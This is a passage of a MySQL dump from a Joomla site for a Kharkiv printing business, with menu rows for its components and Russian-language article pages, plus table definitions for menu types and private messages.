00:00:00',0,0,'class:banners-clients',0,'',22,23,0,'*',1),(106,'main','com_banners_tracks','Tracks','','equipment/Tracks','index.php?option=com_banners&view=tracks','component',1,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners-tracks',0,'',24,25,0,'*',1),(107,'main','com_contact','Contacts','','Contacts','index.php?option=com_contact','component',1,1,1,8,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',3,4,0,'*',1),(108,'main','com_contact','Contacts','','printing-on-canvas/Contacts','index.php?option=com_contact','component',1,7,2,8,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',52,53,0,'*',1),(109,'main','com_contact_categories','Categories','','printing-on-canvas/Categories','index.php?option=com_categories&extension=com_contact','component',1,7,2,6,0,'0000-00-00 00:00:00',0,0,'class:contact-cat',0,'',54,55,0,'*',1),(110,'main','com_messages','Messaging','','Messaging','index.php?option=com_messages','component',1,1,1,15,0,'0000-00-00 00:00:00',0,0,'class:messages',0,'',5,6,0,'*',1),(111,'main','com_messages_add','New Private Message','','printing-on-the-grid/New Private Message','index.php?option=com_messages&task=message.add','component',1,10,2,15,0,'0000-00-00 00:00:00',0,0,'class:messages-add',0,'',60,61,0,'*',1),(113,'main','com_newsfeeds','News Feeds','','News Feeds','index.php?option=com_newsfeeds','component',1,1,1,17,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',7,8,0,'*',1),(114,'main','com_newsfeeds_feeds','Feeds','','digital-printing/Feeds','index.php?option=com_newsfeeds','component',1,13,2,17,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',40,41,0,'*',1),(115,'main','com_newsfeeds_categories','Categories','','digital-printing/Categories','index.php?option=com_categories&extension=com_newsfeeds','component',1,13,2,6,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds-cat',0,'',42,43,0,'*',1),(116,'main','com_redirect','Redirect','','Redirect','index.php?option=com_redirect','component',1,1,1,24,0,'0000-00-00 00:00:00',0,0,'class:redirect',0,'',13,14,0,'*',1),(117,'main','com_search','Basic Search','','Basic Search','index.php?option=com_search','component',1,1,1,19,0,'0000-00-00 00:00:00',0,0,'class:search',0,'',11,12,0,'*',1),(120,'main','com_weblinks_categories','Categories','','printing-on-an-awning/Categories','index.php?option=com_categories&extension=com_weblinks','component',1,18,2,6,0,'0000-00-00 00:00:00',0,0,'class:weblinks-cat',0,'',90,91,0,'*',1),(121,'main','com_finder','Smart Search','','Smart Search','index.php?option=com_finder','component',1,1,1,27,0,'0000-00-00 00:00:00',0,0,'class:finder',0,'',9,10,0,'*',1),(122,'main','com_tags','Tags','','Tags','index.php?option=com_tags','component',1,1,1,29,0,'0000-00-00 00:00:00',0,1,'class:tags',0,'',45,46,0,'',1),(123,'main','com_postinstall','Post-installation messages','','Post-installation messages','index.php?option=com_postinstall','component',1,1,1,32,0,'0000-00-00 00:00:00',0,1,'class:postinstall',0,'',47,48,0,'*',1),(152,'main','COM_PHOCAGALLERY','com-phocagallery','','com-phocagallery','index.php?option=com_phocagallery','component',1,1,1,10013,0,'0000-00-00 00:00:00',0,1,'media/com_phocagallery/images/administrator/icon-16-pg-menu.png',0,'{}',93,120,0,'',1),(153,'main','COM_PHOCAGALLERY_CONTROLPANEL','com-phocagallery-controlpanel','','com-phocagallery/com-phocagallery-controlpanel','index.php?option=com_phocagallery','component',1,152,2,10013,0,'0000-00-00 00:00:00',0,1,'media/com_phocagallery/images/administrator/icon-16-pg-control-panel.png',0,'{}',94,95,0,'',1),(154,'main','COM_PHOCAGALLERY_IMAGES','com-phocagallery-images','','com-phocagallery/com-phocagallery-images','index.php?option=com_phocagallery&view=phocagalleryimgs','component',1,152,2,10013,0,'0000-00-00 00:00:00',0,1,'media/com_phocagallery/images/administrator/icon-16-pg-menu-gal.png',0,'{}',96,97,0,'',1),(155,'main','COM_PHOCAGALLERY_CATEGORIES','com-phocagallery-categories','','com-phocagallery/com-phocagallery-categories','index.php?option=com_phocagallery&view=phocagallerycs','component',1,152,2,10013,0,'0000-00-00 00:00:00',0,1,'media/com_phocagallery/images/administrator/icon-16-pg-menu-cat.png',0,'{}',98,99,0,'',1),(156,'main','COM_PHOCAGALLERY_THEMES','com-phocagallery-themes','','com-phocagallery/com-phocagallery-themes','index.php?option=com_phocagallery&view=phocagalleryt','component',1,152,2,10013,0,'0000-00-00 00:00:00',0,1,'media/com_phocagallery/images/administrator/icon-16-pg-menu-theme.png',0,'{}',100,101,0,'',1),(157,'main','COM_PHOCAGALLERY_CATEGORYRATING','com-phocagallery-categoryrating','','com-phocagallery/com-phocagallery-categoryrating','index.php?option=com_phocagallery&view=phocagalleryra','component',1,152,2,10013,0,'0000-00-00 00:00:00',0,1,'media/com_phocagallery/images/administrator/icon-16-pg-menu-vote.png',0,'{}',102,103,0,'',1),(158,'main','COM_PHOCAGALLERY_IMAGERATING','com-phocagallery-imagerating','','com-phocagallery/com-phocagallery-imagerating','index.php?option=com_phocagallery&view=phocagalleryraimg','component',1,152,2,10013,0,'0000-00-00 00:00:00',0,1,'media/com_phocagallery/images/administrator/icon-16-pg-menu-vote-img.png',0,'{}',104,105,0,'',1),(159,'main','COM_PHOCAGALLERY_CATEGORYCOMMENTS','com-phocagallery-categorycomments','','com-phocagallery/com-phocagallery-categorycomments','index.php?option=com_phocagallery&view=phocagallerycos','component',1,152,2,10013,0,'0000-00-00 00:00:00',0,1,'media/com_phocagallery/images/administrator/icon-16-pg-menu-comment.png',0,'{}',106,107,0,'',1),(160,'main','COM_PHOCAGALLERY_IMAGECOMMENTS','com-phocagallery-imagecomments','','com-phocagallery/com-phocagallery-imagecomments','index.php?option=com_phocagallery&view=phocagallerycoimgs','component',1,152,2,10013,0,'0000-00-00 00:00:00',0,1,'media/com_phocagallery/images/administrator/icon-16-pg-menu-comment-img.png',0,'{}',108,109,0,'',1),(161,'main','COM_PHOCAGALLERY_USERS','com-phocagallery-users','','com-phocagallery/com-phocagallery-users','index.php?option=com_phocagallery&view=phocagalleryusers','component',1,152,2,10013,0,'0000-00-00 00:00:00',0,1,'media/com_phocagallery/images/administrator/icon-16-pg-menu-users.png',0,'{}',110,111,0,'',1),(162,'main','COM_PHOCAGALLERY_FB','com-phocagallery-fb','','com-phocagallery/com-phocagallery-fb','index.php?option=com_phocagallery&view=phocagalleryfbs','component',1,152,2,10013,0,'0000-00-00 00:00:00',0,1,'media/com_phocagallery/images/administrator/icon-16-pg-menu-fb.png',0,'{}',112,113,0,'',1),(163,'main','COM_PHOCAGALLERY_TAGS','com-phocagallery-tags','','com-phocagallery/com-phocagallery-tags','index.php?option=com_phocagallery&view=phocagallerytags','component',1,152,2,10013,0,'0000-00-00 00:00:00',0,1,'media/com_phocagallery/images/administrator/icon-16-pg-menu-tags.png',0,'{}',114,115,0,'',1),(164,'main','COM_PHOCAGALLERY_STYLES','com-phocagallery-styles','','com-phocagallery/com-phocagallery-styles','index.php?option=com_phocagallery&view=phocagalleryefs','component',1,152,2,10013,0,'0000-00-00 00:00:00',0,1,'media/com_phocagallery/images/administrator/icon-16-pg-menu-styles.png',0,'{}',116,117,0,'',1),(165,'main','COM_PHOCAGALLERY_INFO','com-phocagallery-info','','com-phocagallery/com-phocagallery-info','index.php?option=com_phocagallery&view=phocagalleryin','component',1,152,2,10013,0,'0000-00-00 00:00:00',0,1,'media/com_phocagallery/images/administrator/icon-16-pg-menu-info.png',0,'{}',118,119,0,'',1),(168,'main','COM_XMAP_TITLE','com-xmap-title','','com-xmap-title','index.php?option=com_xmap','component',1,1,1,10030,0,'0000-00-00 00:00:00',0,1,'components/com_xmap/images/xmap-favicon.png',0,'{}',121,122,0,'',1),(173,'main','COM_SECURITYCHECK_MENU','com-securitycheck-menu','','com-securitycheck-menu','index.php?option=com_securitycheck','component',1,1,1,10049,0,'0000-00-00 00:00:00',0,1,'../media/com_securitycheck/images/tick_16x16.png',0,'{}',123,124,0,'',1),(183,'other-menu','Отзывы','otzyvy','','otzyvy','index.php?option=com_fst&view=test&prodid=-1','component',0,1,1,10053,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"hide_add\":\"0\",\"test_show_prod_mode\":\"-1\",\"test_pages\":\"-1\",\"test_always_prod_select\":\"-1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',125,126,0,'*',0),(209,'dop-menu','Модульные картины','modulnye-kartiny','','modulnye-kartiny','index.php?option=com_content&view=article&id=29','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\\u041c\\u043e\\u0434\\u0443\\u043b\\u044c\\u043d\\u044b\\u0435 \\u043a\\u0430\\u0440\\u0442\\u0438\\u043d\\u044b \\u0425\\u0430\\u0440\\u044c\\u043a\\u043e\\u0432 \\u041d\\u0435\\u0434\\u043e\\u0440\\u043e\\u0433\\u043e | \\u0414\\u043e\\u0441\\u0442\\u0430\\u0432\\u043a\\u0430 \\u043f\\u043e \\u0423\\u043a\\u0440\\u0430\\u0438\\u043d\\u0435\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',127,128,0,'*',0),(210,'dop-menu','Плоттерная порезка ','plotternaya-podrezka','','plotternaya-podrezka','index.php?option=com_content&view=article&id=30','component',1,1,1,22,62,'2016-05-05 07:59:58',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"Плоттерная порезка (Харьков) пленки\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',129,130,0,'*',0),(211,'other-menu','Интернет-каталог модульных картин','internet-katalog-modulnykh-kartin','','internet-katalog-modulnykh-kartin','index.php?option=com_content&view=article&id=31','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"Интернет-каталог модульных картин\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',131,132,0,'*',0),(212,'other-menu','Двухкомпонентные шаблоны модульных картин','dvukhkomponentnye-shablony-modulnykh-kartin','','dvukhkomponentnye-shablony-modulnykh-kartin','index.php?option=com_content&view=article&id=33','component',-2,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"Двухкомпонентные шаблоны (диптих)\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',133,134,0,'*',0),(213,'other-menu','Трехкомпонентные шаблоны модульных картин','trekhkomponentnye-shablony-modulnykh-kartin','','trekhkomponentnye-shablony-modulnykh-kartin','index.php?option=com_content&view=article&id=34','component',-2,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"Трехкомпонентные шаблоны\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',135,136,0,'*',0),(216,'other-menu','Четырехкомпонентные шаблоны модульных картин','chetyrekhkomponentnye-shablony-modulnykh-kartin','','chetyrekhkomponentnye-shablony-modulnykh-kartin','index.php?option=com_content&view=article&id=36','component',-2,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"Четырехкомпонентные шаблоны модульных картин\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',137,138,0,'*',0),(217,'other-menu','Пятикомпонентные шаблоны модульных картин','pyatikomponentnye-shablony-modulnykh-kartin','','pyatikomponentnye-shablony-modulnykh-kartin','index.php?option=com_content&view=article&id=37','component',-2,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"Пятикомпонентные шаблоны модульных картин\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',139,140,0,'*',0),(219,'main','COM_ADMINTOOLS','com-admintools','','com-admintools','index.php?option=com_admintools','component',1,1,1,10042,0,'0000-00-00 00:00:00',0,1,'com_admintools/media/images/admintools-16.png',0,'{}',141,142,0,'',1),(220,'main','FREESTYLE_TESTIMONIALS','freestyle-testimonials','','freestyle-testimonials','index.php?option=com_fst','component',1,1,1,10053,0,'0000-00-00 00:00:00',0,1,'components/com_fst/assets/menu_icon_s.png',0,'{}',143,160,0,'',1),(221,'main','COM_FST_SETTINGS','com-fst-settings','','freestyle-testimonials/com-fst-settings','index.php?option=com_fst&view=settings','component',1,220,2,10053,0,'0000-00-00 00:00:00',0,1,'components/com_fsf/assets/images/blank_16.png',0,'{}',144,145,0,'',1),(222,'main','COM_FST_TEMPLATES','com-fst-templates','','freestyle-testimonials/com-fst-templates','index.php?option=com_fst&view=templates','component',1,220,2,10053,0,'0000-00-00 00:00:00',0,1,'components/com_fsf/assets/images/blank_16.png',0,'{}',146,147,0,'',1),(223,'main','COM_FST_VIEW_SETTINGS','com-fst-view-settings','','freestyle-testimonials/com-fst-view-settings','index.php?option=com_fst&view=settingsview','component',1,220,2,10053,0,'0000-00-00 00:00:00',0,1,'components/com_fsf/assets/images/blank_16.png',0,'{}',148,149,0,'',1),(224,'main','COM_FST_EMAIL_TEMPLATES','com-fst-email-templates','','freestyle-testimonials/com-fst-email-templates','index.php?option=com_fst&view=emails','component',1,220,2,10053,0,'0000-00-00 00:00:00',0,1,'components/com_fsf/assets/images/blank_16.png',0,'{}',150,151,0,'',1),(225,'main','COM_FST_PRODUCTS','com-fst-products','','freestyle-testimonials/com-fst-products','index.php?option=com_fst&view=prods','component',1,220,2,10053,0,'0000-00-00 00:00:00',0,1,'components/com_fsf/assets/images/blank_16.png',0,'{}',152,153,0,'',1),(226,'main','COM_FST_MODERATION','com-fst-moderation','','freestyle-testimonials/com-fst-moderation','index.php?option=com_fst&view=tests','component',1,220,2,10053,0,'0000-00-00 00:00:00',0,1,'components/com_fsf/assets/images/blank_16.png',0,'{}',154,155,0,'',1),(227,'main','COM_FST_USERS','com-fst-users','','freestyle-testimonials/com-fst-users','index.php?option=com_fst&view=fusers','component',1,220,2,10053,0,'0000-00-00 00:00:00',0,1,'components/com_fsf/assets/images/blank_16.png',0,'{}',156,157,0,'',1),(228,'main','COM_FST_ADMIN','com-fst-admin','','freestyle-testimonials/com-fst-admin','index.php?option=com_fst&view=backup','component',1,220,2,10053,0,'0000-00-00 00:00:00',0,1,'components/com_fsf/assets/images/blank_16.png',0,'{}',158,159,0,'',1),(236,'main','JCE','jce','','jce','index.php?option=com_jce','component',1,1,1,10056,0,'0000-00-00 00:00:00',0,1,'components/com_jce/media/img/menu/logo.png',0,'{}',161,170,0,'',1),(237,'main','WF_MENU_CPANEL','wf-menu-cpanel','','jce/wf-menu-cpanel','index.php?option=com_jce','component',1,236,2,10056,0,'0000-00-00 00:00:00',0,1,'components/com_jce/media/img/menu/jce-cpanel.png',0,'{}',162,163,0,'',1),(238,'main','WF_MENU_CONFIG','wf-menu-config','','jce/wf-menu-config','index.php?option=com_jce&view=config','component',1,236,2,10056,0,'0000-00-00 00:00:00',0,1,'components/com_jce/media/img/menu/jce-config.png',0,'{}',164,165,0,'',1),(239,'main','WF_MENU_PROFILES','wf-menu-profiles','','jce/wf-menu-profiles','index.php?option=com_jce&view=profiles','component',1,236,2,10056,0,'0000-00-00 00:00:00',0,1,'components/com_jce/media/img/menu/jce-profiles.png',0,'{}',166,167,0,'',1),(240,'main','WF_MENU_INSTALL','wf-menu-install','','jce/wf-menu-install','index.php?option=com_jce&view=installer','component',1,236,2,10056,0,'0000-00-00 00:00:00',0,1,'components/com_jce/media/img/menu/jce-install.png',0,'{}',168,169,0,'',1),(242,'other-menu','Работа','rabota','','rabota','index.php?option=com_content&view=article&id=41','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',171,172,0,'*',0),(243,'other-menu','Как подтвердить оплату за заказ','kak-podtverdit-oplatu-za-zakaz','','kak-podtverdit-oplatu-za-zakaz','index.php?option=com_content&view=article&id=42','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',173,174,0,'*',0),(245,'main','com_associations','multilingual-associations','','multilingual-associations','index.php?option=com_associations','component',1,1,1,34,0,'0000-00-00 00:00:00',0,1,'class:associations',0,'{}',175,176,0,'*',1),(254,'mainmenu','Фоторедактор','fotoredaktor','','fotoredaktor','index.php?option=com_content&view=article&id=43','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\\u041e\\u043d\\u043b\\u0430\\u0439\\u043d \\u0444\\u043e\\u0442\\u043e\\u0440\\u0435\\u0434\\u0430\\u043a\\u0442\\u043e\\u0440. \",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',177,178,0,'*',0),(255,'main','COM_AKEEBA','com-akeeba','','com-akeeba','index.php?option=com_akeeba','component',1,1,1,10047,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',179,180,0,'',1),(256,'main','com_weblinks','com-weblinks','','com-weblinks','index.php?option=com_weblinks','component',1,1,1,21,0,'0000-00-00 00:00:00',0,1,'class:weblinks',0,'{}',181,186,0,'',1),(257,'main','com_weblinks_links','com-weblinks-links','','com-weblinks/com-weblinks-links','index.php?option=com_weblinks','component',1,256,2,21,0,'0000-00-00 00:00:00',0,1,'class:weblinks',0,'{}',182,183,0,'',1),(258,'main','com_weblinks_categories','com-weblinks-categories','','com-weblinks/com-weblinks-categories','index.php?option=com_categories&extension=com_weblinks','component',1,256,2,21,0,'0000-00-00 00:00:00',0,1,'class:weblinks-cat',0,'{}',184,185,0,'',1);
/*!40000 ALTER TABLE `j25_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_menu_types`
--

DROP TABLE IF EXISTS `j25_menu_types`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_menu_types` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `asset_id` int(10) unsigned NOT NULL DEFAULT '0',
  `menutype` varchar(24) COLLATE utf8mb4_unicode_ci NOT NULL,
  `title` varchar(48) COLLATE utf8mb4_unicode_ci NOT NULL,
  `description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `client_id` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_menutype` (`menutype`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_menu_types`
--

LOCK TABLES `j25_menu_types` WRITE;
/*!40000 ALTER TABLE `j25_menu_types` DISABLE KEYS */;
INSERT INTO `j25_menu_types` VALUES (1,0,'mainmenu','Главное меню','Главное меню этого сайта',0),(2,0,'dop-menu','Левое меню','Левое меню',0),(3,0,'other-menu','Дополнительное меню','',0);
/*!40000 ALTER TABLE `j25_menu_types` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_messages`
--

DROP TABLE IF EXISTS `j25_messages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_messages` (
  `message_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id_from` int(10) unsigned NOT NULL DEFAULT '0',
  `user_id_to` int(10) unsigned NOT NULL DEFAULT '0',
  `folder_id` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `date_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `priority` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `subject` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `message` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`message_id`),
  KEY `useridto_state` (`user_id_to`,`state`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_messages`
--

LOCK TABLES `j25_messages` WRITE;
/*!40000 ALTER TABLE `j25_messages` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_messages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_messages_cfg`
--

DROP TABLE IF EXISTS `j25_messages_cfg`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_messages_cfg` (
  `user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `cfg_name` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `cfg_value` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  UNIQUE KEY `idx_user_var_name` (`user_id`,`cfg_name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_messages_cfg`
--

LOCK TABLES `j25_messages_cfg` WRITE;
/*!40000 ALTER TABLE `j25_messages_cfg` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_messages_cfg` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_modules`
--

DROP TABLE IF EXISTS `j25_modules`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_modules` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
